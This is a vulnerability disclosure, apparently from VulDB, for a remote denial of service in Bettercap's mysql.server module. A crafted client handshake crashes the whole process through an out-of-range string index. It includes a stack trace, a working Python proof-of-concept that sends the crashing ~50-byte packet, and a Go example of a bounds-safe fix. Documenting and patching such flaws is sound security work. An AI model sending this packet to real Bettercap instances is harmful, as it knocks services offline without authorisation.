Submission #811163: Bettercap <=v2.41.5 Integer Coercion Error details

Title: Bettercap <=v2.41.5 Integer Coercion Error

Description: mysql.server crashes entire Bettercap process on crafted client handshake leading to remote DoS.

<details>
<summary>Full debug output</summary>

```
[mysql.server] server starting on address 192.168.1.x:3306
[mysql.server] connection from 192.168.1.y
panic: runtime error: index out of range [8] with length 8

goroutine 53 [running]:
github.com/bettercap/bettercap/v2/modules/mysql_server.(*MySQLServer).Start.func1()
	.../modules/mysql_server/mysql_server.go:133 +0x1051
created by github.com/bettercap/bettercap/v2/session.(*SessionModule).SetRunning in goroutine 1
	.../session/module.go:268 +0x17f
```

</details>

### Steps to Reproduce

1. Start bettercap with `mysql.server` active:
   ```
   sudo bettercap -iface eth0 -eval "mysql.server on"
   ```
2. Confirm it is listening on port 3306:
   ```
   ss -tlnp | grep 3306
   ```
3. From any machine on the network, send a MySQL client handshake response where **byte 5 (the high byte of the capability flags) is `0x00`**:
   ```python
   import socket, time

   s = socket.socket()
   s.connect(("192.168.1.x", 3306))
   s.recv(4096)  # read server greeting

   pkt = bytearray(50)
   pkt[0] = 0x2e   # packet length
   pkt[3] = 0x01   # sequence
   pkt[4] = 0x03   # capability flags low byte (value = 3)
   pkt[5] = 0x00   # capability flags high byte ← triggers crash
   pkt[9] = 0x01   # max packet size
   pkt[10] = 0x21  # charset
   pkt[35:40] = b"root\x00"

   s.sendall(bytes(pkt))
   time.sleep(1)
   s.close()
   ```
4. Observe bettercap crash immediately. Port 3306 stops accepting connections.

**Expected behavior:** Malformed or minimal capability flags are handled gracefully; the connection is closed with an error; bettercap keeps running.

**Actual behavior:** `mysql_server.go` line 133 formats the capability value as a binary string and immediately indexes position 8:

```go
// line 132
capabilities := fmt.Sprintf("%08b", int(uint32(readBuffer[4]) | uint32(readBuffer[5])<<8))
// line 133
loadData := string(capabilities[8])
```

When `readBuffer[5]` is `0x00` the combined value is ≤ 255. `fmt.Sprintf("%08b", ...)` produces **exactly 8 characters** for values 0–255. Indexing `capabilities[8]` on a length-8 string panics:

```
panic: runtime error: index out of range [8] with length 8
```

The connection handler runs inside the module's main goroutine with no `recover()`, so the panic propagates and terminates the **entire bettercap process**. Any unauthenticated client on the network can trigger this with a single ~50-byte packet.
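The following Go program is an added example, not bettercap's code and not part of the reporter's submission. It places the two reported lines beside a bounds-safe rewrite so the failure mode can be seen in a unit test: the `%08b`-then-index-8 lookup panics for any capability word of 255 or less, while reading the two bytes with `encoding/binary` and testing a mask never indexes anything. The `guardConn` wrapper is a hypothetical per-connection recover, added as the second mitigation layer the report's last paragraph implies. Assumptions are marked in comments: the mask `0x80` (MySQL's `CLIENT_LOCAL_FILES` bit) is the bit the original index reaches when the high byte is nonzero, and the two handshake fragments are constructed for the demonstration.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// ErrShortHandshake is returned when the client packet does not even carry
// the two capability bytes the parser reads.
var ErrShortHandshake = errors.New("handshake response too short")

// loadDataVulnerable mirrors the two reported lines: it formats the 16-bit
// capability word with "%08b" and indexes position 8. For any value <= 255
// the formatted string is exactly 8 characters long, so the index panics.
// A recover is added here only so the panic can be observed in a test;
// the report states the real handler has no recover() at all.
func loadDataVulnerable(readBuffer []byte) (loadData string, panicked bool) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
		}
	}()
	capabilities := fmt.Sprintf("%08b", int(uint32(readBuffer[4])|uint32(readBuffer[5])<<8))
	loadData = string(capabilities[8])
	return loadData, false
}

// clientLocalFiles is the MySQL CLIENT_LOCAL_FILES capability bit (0x80).
// Assumption: this is the bit the index-8 lookup reaches when the high byte
// is 0x80 or more ("%08b" then yields 16 characters and position 8 is
// bit 7). For smaller high bytes the original lookup does not read a fixed
// bit at all, which is a second reason to use a mask.
const clientLocalFiles uint16 = 0x80

// loadDataSafe reads the same two bytes with a length check and tests the
// bit with a mask, so no client-supplied value can index outside a string.
func loadDataSafe(readBuffer []byte) (bool, error) {
	if len(readBuffer) < 6 {
		return false, ErrShortHandshake
	}
	flags := binary.LittleEndian.Uint16(readBuffer[4:6])
	return flags&clientLocalFiles != 0, nil
}

// guardConn is a hypothetical wrapper for a per-connection handler: a panic
// inside the handler becomes an error for that one connection instead of
// unwinding the whole process. The parser fix above is the first layer;
// this is the safety net behind it.
func guardConn(handler func() error) (err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("connection handler panicked: %v", r)
		}
	}()
	return handler()
}

func main() {
	// Constructed handshake fragments (only bytes 4 and 5 matter here).
	crashing := []byte{0x2e, 0x00, 0x00, 0x01, 0x03, 0x00} // high byte 0x00
	typical := []byte{0x2e, 0x00, 0x00, 0x01, 0x85, 0xa6}  // high byte set

	_, panicked := loadDataVulnerable(crashing)
	fmt.Println("vulnerable parser panicked on crafted packet:", panicked) // true

	ok, err := loadDataSafe(crashing)
	fmt.Println("safe parser on crafted packet:", ok, err) // false <nil>

	ok, err = loadDataSafe(typical)
	fmt.Println("safe parser on typical packet:", ok, err) // true <nil>

	err = guardConn(func() error {
		_ = string(fmt.Sprintf("%08b", 3)[8]) // same out-of-range index
		return nil
	})
	fmt.Println("guarded handler:", err) // connection handler panicked: ...
}
```

`go run` prints the four lines; the point to take from them is that the safe parser returns a plain `false` for the crafted packet where the original parser panics, and that even the unchanged lookup becomes a logged per-connection error once it runs under a recover.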
Source: https://github.com/bettercap/bettercap/issues/1265
User: dapickle (UID 97309)
Submitted: 2026-04-23 08:57 (1 month ago)
Moderation: 2026-05-10 18:05 (17 days later)
Status: Accepted
VulDB entry: 362573 [bettercap up to 2.41.5 MySQL Server mysql_server.go denial of service]
Points: 20
